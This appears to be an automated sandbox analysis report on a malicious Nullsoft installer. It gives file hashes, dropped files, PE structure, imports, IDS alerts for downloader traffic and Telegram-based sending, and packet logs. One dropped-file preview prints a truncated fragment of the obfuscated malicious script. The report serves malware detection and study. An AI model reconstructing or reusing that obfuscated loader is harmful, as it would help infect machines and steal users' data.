Entropy (8bit):	5.141090975931647
Encrypted:	false
SSDEEP:	1536:lyzODfhLJKB4BBn+gwnQKD/2zuWq02mtpY1+sy/NIxnma80j0Cnrt:ZzhL0mBxRKPDuzuaY1+TFIIaHQCnrt
MD5:	EA1E2A9F4DE28839B57FE9978897843C
SHA1:	B012C5AC62DBC1657062674E6FF102A2209AE777
SHA-256:	7C6BBB62D20BB41FF822A460AFCC6CD4DC670453AA333558DB29D53B7E6BB027
SHA-512:	BA127E3E91C4E233E778ABDD86E59B5272023C99ED0C069361E3AE0B8D4E65A7D3F57887AF7BB714F50DF22572CB845088B67F4184254E6155BD196ADC42537A
Malicious:	true
Preview:	$Laydown=$Lobworms;........$Throating = @'.Nadiral. poteks$ IsobarKEndetrebFangarmeSkem lghKrydsoru PladevlOzonosce artoteb B tonheUnperfet TetaninFyreseddFalci le R,etamlMellempsExceedeeVandgan1 Underb5Initial6Fimshum=Kvgprod$Deboi eF.oligereS renskmIndt geitemser nRisselsi Impl cs FldnineTaglagtrEndagsbiprogr mnMarplotgSaar arsApsisse2 Immor 1Kritise8 Firlin;Cinchon.HeavercfWhinew uHy,atidn AndelscTattlemtSandblsiQuo,edvoFoetikonRumblyg ForbrndU .paldin BeskersFinnerne B,ontonFestpros KnoweriFacsimibG odiatlJ velereAlert dnsourlineskeptiksCyanoacsAdvokat Beekeep( Me als$ Reda tEgaardrylDissuasuFormidaa LgeattnSekun atVareforsParotoi,D.vleri$ UndervHKe,mesbj s mmettSwan antnagingga ReservlC ltopheRek nkerBu giecaDaphnisnGeigertlRedem ngMonot ng St,rcgeTagpa ft RhynchsCa nabi)Reporto Overdim{Fiskeri.Feldspa.Biob bl$VivresrMPriva uiCrossprnConchylaValtherrKeypun eUnservitTeknikeeTheriandP ototy taffere(TenaimoEanotu uiKundeves beaut,t AvlsbreTrappegdWasu,umdEtplansfFormfasoPr,tervdAgte

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udfring53.lev

Download File

Process:	C:\Users\user\Desktop\lkETeneRL3.exe
File Type:	data
Category:	dropped
Size (bytes):	1592092
Entropy (8bit):	0.15888263670695008
Encrypted:	false
SSDEEP:	768:soeSIeBIi+CIHPx0zCnX4uXSmBKjtdYKffNFYu5bA+KNiyvYFxUT:G
MD5:	B4834640DF9710A3741E667024766F83
SHA1:	B392E116F95A0388B7D82C7BD453FD4B3AABE9B6
SHA-256:	9091FB5A1B166D03C61848505A440E8B33ACA701DE691D7E4EB8FBFE7379FCAF
SHA-512:	76396F26F236DE394EE3C2441073BF59107F61393E87D730CC70E989582361AACDAEA20E59EA49CC0F125FA6A8405823B17A5D24EC111391E83647FC3687F48C
Malicious:	false
Preview:	.s...................W.....................................................................................0.......................................................................................................................................................................................................~..........................................................................................................................................................................................................................................................................................................................................................2...........................................................................................j.............................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Ungallantness.kok

Download File

Process:	C:\Users\user\Desktop\lkETeneRL3.exe
File Type:	data
Category:	dropped
Size (bytes):	805283
Entropy (8bit):	0.1589716616809398
Encrypted:	false
SSDEEP:	768:nHrNCx0tE2B2CS9/Nq7r2Cr5WHOKjzQT:rt
MD5:	5ACF4982DBF490AD4AE83C7D1856E89C
SHA1:	66FE8A2B3323ED8CF74FBF6C681D0AA3496A6185
SHA-256:	9F10026E2214CA3C9C59A9AF9913C2EF9C01AC32EFB3A7DB3A2BEC568809904C
SHA-512:	B1BFB5A4FA9B1B7841254161F9347ADC44E3269D13AB7E703A2EC009B95844442E66312436835185E7779673C2E5553659BD85F4B141E5CF907EEE9198EC1F82
Malicious:	false
Preview:	...........................................................................................................................................................................................................................................................................................................................................................................J........\........................................................................................................................................................................................................................................................J..................................................................................M.................c.....................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Yaply50.txt

Download File

Process:	C:\Users\user\Desktop\lkETeneRL3.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	395
Entropy (8bit):	4.303174937960327
Encrypted:	false
SSDEEP:	12:JgWpd0rRenzLLJBl8PjZQbFXEExWTCD/u:SWcrknXlKjZA2ENDm
MD5:	C271D6423649C301105C8A2ECA25F9E4
SHA1:	CFAC3739C43482547D096C88670FA646FB62A56C
SHA-256:	E58319C2FCC8C30C70969BED761493AFD5B7F29D12FDBD1D96C0BBD93EFC6DB2
SHA-512:	B04BBDBA8AFB3D93D6E10C9EA838EC3B2D3798CB0F8C383C44329FA35B4F6E72B4023FB1A6ADAFE49AF258CD876A5BB0A019C742353936EB6C60601937EAF04D
Malicious:	false
Preview:	crioceras shepard vildfarelserne,lg udgangsvrdiers alkaloids misaimed rabiat skihejsers seashine,impeccancy brndbarestes maskalonges strandvaskers forsikringsaftalelov sportsvognes mirlitons studieegnethedens fontina sprawled..assiento iodizing ferslevs blowbacks mementoernes sinicizing ahura zonal nedkradsende omtydet..spermatin predisable sulphureity.autofermentation symbolry recepturerets,

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\rancheria.pro

Download File

Process:	C:\Users\user\Desktop\lkETeneRL3.exe
File Type:	data
Category:	dropped
Size (bytes):	947949
Entropy (8bit):	0.15996398773946943
Encrypted:	false
SSDEEP:	768:oASe3amtYNbHv0lnDzgcAUOkEuypx/zSFad:
MD5:	B34FC802327D0F5F02281FD236BD67C6
SHA1:	E7E1E1E5288F16B42FB8B5A62C9B33A4B8D02341
SHA-256:	1B795733FFC880D3DECD0A23BD3CCB22AC6A80EEA5729D407336D891F0523884
SHA-512:	DD170F304175543B07EABE1F09D0548DBE9C332074A0493D1BC4400494356104E16D47C684EB04A04447283427612B1EAE5C40BBB42E087F77FE72C841B9DB7B
Malicious:	false
Preview:	..........................................................................................................................................................................................................e..................................................................................................................................................................................................................................................................... ...............................................................................................)......................................................................K...............'................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.740389167872801
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	lkETeneRL3.exe
File size:	574'016 bytes
MD5:	21eb0bfd14e8ab29a3c29d5b60ee09e1
SHA1:	9cff284042166495e20428500545b99330a1a9c8
SHA256:	f459c492671666638899a5c5d716538ecff3516338e5cea64e5d53fa421ec2ba
SHA512:	cf0d15a179940c800cb669384a0874200650b0da7b8db58c3e1a8cf87cb5d3ac5953a10c68366436917812f24d32a7f12506831294bec53b6e41ed8a7b1a56e8
SSDEEP:	12288:n93jlz5CwkzUf1DYt/itWe7NAZSfR6IWAKsbk1B8B:n93jlzcxzUf9S6tx7mWKNeoiB
TLSH:	36C4D094A6A68921C69D423496937A1EC27C9FD612E6D012FB357D33FD317ADBF00283
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F...v...F...@...F.Rich..F.........................PE..L....c.W.................^.........

File Icon


Icon Hash:	1956767870707155

Static PE Info

General

Entrypoint:	0x40322b
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x57956393 [Mon Jul 25 00:55:47 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	4f67aeda01a0484282e8c59006b0b352

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Ostracodan, E=Taktreguler105@taxametres.esp, O=Ostracodan, L=Versailles, OU="Aarsags Smaskfuldt ", S=\xcele-de-France, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	07/07/2024 12:52:20 07/07/2025 12:52:20
Subject Chain	CN=Ostracodan, E=Taktreguler105@taxametres.esp, O=Ostracodan, L=Versailles, OU="Aarsags Smaskfuldt ", S=\xcele-de-France, C=FR
Version:	3
Thumbprint MD5:	5610C36A779BB3432D1DF0858F4CDBC0
Thumbprint SHA-1:	F6815A7AB2330FA53562909D6CDC9EA85C152839
Thumbprint SHA-256:	AC059A02877CB12BF003984C12EC558CBB049BA677390EB6C71707B4DED59AA5
Serial:	5A1A07F6FCDEE04B4565543F9B3F3021334C2CD4

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409130h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407120h]
call dword ptr [004070ACh]
cmp ax, 00000006h
je 00007F05C8F010C3h
push ebx
call 00007F05C8F04049h
cmp eax, ebx
je 00007F05C8F010B9h
push 00000C00h
call eax
mov esi, 00407298h
push esi
call 00007F05C8F03FC5h
push esi
call dword ptr [004070A8h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F05C8F0109Dh
push ebp
push 00000009h
call 00007F05C8F0401Ch
push 00000007h
call 00007F05C8F04015h
mov dword ptr [00423724h], eax
call dword ptr [00407044h]
push ebx
call dword ptr [00407288h]
mov dword ptr [004237D8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0041ECF0h
call dword ptr [00407174h]
push 004091ECh
push 00422F20h
call 00007F05C8F03C3Fh
call dword ptr [004070A4h]
mov ebp, 00429000h
push eax
push ebp
call 00007F05C8F03C2Dh
push ebx
call dword ptr [00407154h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7428	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x38000	0x1bec0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x8bb08	0x738
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5dc5	0x5e00	566b191b40fde4369ae73a05b57df1d2	False	0.6685089760638298	data	6.47110609300208	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1246	0x1400	6389f916226544852e494114faf192ad	False	0.4271484375	data	5.0003960999706765	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1a818	0x400	72dcd89e8824ae186467be61797ed81e	False	0.6474609375	data	5.220595003364983	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x24000	0x14000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x38000	0x1bec0	0x1c000	3d561cd710712943d7c2ece81602a3e4	False	0.42149135044642855	data	5.782312893766128	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x382f8	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 0	English	United States	0.1945019519697149
RT_ICON	0x48b20	0x65dd	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9937109330060974
RT_ICON	0x4f100	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States	0.35518672199170126
RT_ICON	0x516a8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	United States	0.43363039399624764
RT_ICON	0x52750	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	English	United States	0.5209016393442623
RT_ICON	0x530d8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	United States	0.62677304964539
RT_DIALOG	0x53540	0x100	data	English	United States	0.5234375
RT_DIALOG	0x53640	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x53760	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x53828	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x53888	0x5a	data	English	United States	0.7888888888888889
RT_VERSION	0x538e8	0x294	OpenPGP Secret Key	English	United States	0.5242424242424243
RT_MANIFEST	0x53b80	0x33d	XML 1.0 document, ASCII text, with very long lines (829), with no line terminators	English	United States	0.5536791314837153

Imports

DLL	Import
KERNEL32.dll	CopyFileA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetFileAttributesA, SetFileAttributesA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, GetCurrentProcess, GetFullPathNameA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, lstrcpynA, SetErrorMode, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
USER32.dll	ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll	RegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T06:31:31.506270+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49976	216.58.206.78	443	TCP
2025-01-11T06:31:36.462774+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49978	158.101.44.242	80	TCP
2025-01-11T06:31:37.587764+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49978	158.101.44.242	80	TCP
2025-01-11T06:31:38.167637+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49980	104.21.112.1	443	TCP
2025-01-11T06:31:38.744256+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49981	158.101.44.242	80	TCP
2025-01-11T06:31:41.275358+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49985	158.101.44.242	80	TCP
2025-01-11T06:31:47.956669+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.7	49995	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 06:31:30.453433990 CET	49976	443	192.168.2.7	216.58.206.78
Jan 11, 2025 06:31:30.453484058 CET	443	49976	216.58.206.78	192.168.2.7
Jan 11, 2025 06:31:30.453564882 CET	49976	443	192.168.2.7	216.58.206.78
Jan 11, 2025 06:31:30.464277029 CET	49976	443	192.168.2.7	216.58.206.78
Jan 11, 2025 06:31:30.464294910 CET	443	49976	216.58.206.78	192.168.2.7
Jan 11, 2025 06:31:31.121480942 CET	443	49976	216.58.206.78	192.168.2.7
Jan 11, 2025 06:31:31.121653080 CET	49976	443	192.168.2.7	216.58.206.78
Jan 11, 2025 06:31:31.122673988 CET	443	49976	216.58.206.78	192.168.2.7
Jan 11, 2025 06:31:31.122736931 CET	49976	443	192.168.2.7	216.58.206.78
Jan 11, 2025 06:31:31.186598063 CET	49976	443	192.168.2.7	216.58.206.78
Jan 11, 2025 06:31:31.186631918 CET	443	49976	216.58.206.78	192.168.2.7
Jan 11, 2025 06:31:31.187201977 CET	443	49976	216.58.206.78	192.168.2.7
Jan 11, 2025 06:31:31.187359095 CET	49976	443	192.168.2.7	216.58.206.78
Jan 11, 2025 06:31:31.190551996 CET	49976	443	192.168.2.7	216.58.206.78
Jan 11, 2025 06:31:31.231370926 CET	443	49976	216.58.206.78	192.168.2.7
Jan 11, 2025 06:31:31.506311893 CET	443	49976	216.58.206.78	192.168.2.7
Jan 11, 2025 06:31:31.506407022 CET	49976	443	192.168.2.7	216.58.206.78
Jan 11, 2025 06:31:31.506429911 CET	443	49976	216.58.206.78	192.168.2.7
Jan 11, 2025 06:31:31.506474018 CET	49976	443	192.168.2.7	216.58.206.78
Jan 11, 2025 06:31:31.506525040 CET	49976	443	192.168.2.7	216.58.206.78
Jan 11, 2025 06:31:31.506607056 CET	443	49976	216.58.206.78	192.168.2.7
Jan 11, 2025 06:31:31.506963015 CET	443	49976	216.58.206.78	192.168.2.7
Jan 11, 2025 06:31:31.506968975 CET	49976	443	192.168.2.7	216.58.206.78
Jan 11, 2025 06:31:31.507016897 CET	49976	443	192.168.2.7	216.58.206.78
Jan 11, 2025 06:31:31.538300037 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:31.538347960 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:31.538459063 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:31.538713932 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:31.538727999 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:32.187396049 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:32.187494040 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:32.194801092 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:32.194813967 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:32.195537090 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:32.195595980 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:32.196031094 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:32.239341974 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.026009083 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.026144981 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.031939983 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.032028913 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.044374943 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.044469118 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.044477940 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.044523001 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.050465107 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.050529003 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.114041090 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.114139080 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.114146948 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.114192009 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.118935108 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.118990898 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.119009972 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.119018078 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.119035959 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.119077921 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.123558998 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.123622894 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.123631954 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.123672962 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.128288031 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.128345966 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.128355026 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.128398895 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.134260893 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.134346962 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.134356022 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.134404898 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.140518904 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.140625954 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.140650034 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.140701056 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.146753073 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.146826029 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.146841049 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.146891117 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.153140068 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.153224945 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.153238058 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.153299093 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.158772945 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.158991098 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.158998013 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.159051895 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.164521933 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.164592028 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.164598942 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.164645910 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.170375109 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.170461893 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.170489073 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.170548916 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.176249981 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.176311016 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.180064917 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.180119038 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.181951046 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.182008028 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.202620029 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.202707052 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.202722073 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.202752113 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.202770948 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.202800989 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.207398891 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.207456112 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.207465887 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.207488060 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.207504034 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.207539082 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.207545042 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.207597017 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.212312937 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.212373018 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.212385893 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.212412119 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.212429047 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.212460995 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.215399981 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.215461969 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.216974020 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.217031956 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.220251083 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.220314980 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.221713066 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.221755028 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.223836899 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.223892927 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.226423025 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.226732016 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.228230000 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.228362083 CET	49977	443	192.168.2.7	142.250.185.129
